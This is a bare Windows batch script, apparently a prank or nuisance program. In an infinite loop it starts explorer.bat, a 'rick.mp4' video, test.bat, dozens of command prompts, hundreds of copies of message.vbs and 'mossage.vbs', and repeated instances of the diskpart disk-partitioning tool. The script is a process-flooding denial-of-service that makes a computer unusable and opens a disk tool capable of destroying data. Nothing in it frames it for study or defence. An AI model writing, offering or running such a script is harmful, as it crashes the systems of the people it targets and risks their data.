@echo off
:A
start explorer.bat
start rick.mp4
start rick.mp4
start rick.mp4
start rick.mp4
start rick.mp4
start rick.mp4
start rick.mp4
start test.bat
start test.bat
start test.bat
start test.bat
start test.bat
start test.bat
start test.bat
start test.bat

start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start cmd.exe
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe


start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe
start diskpart.exe

start diskpart.exe
start diskpart.exe
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start message.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs
start mossage.vbs

goto A




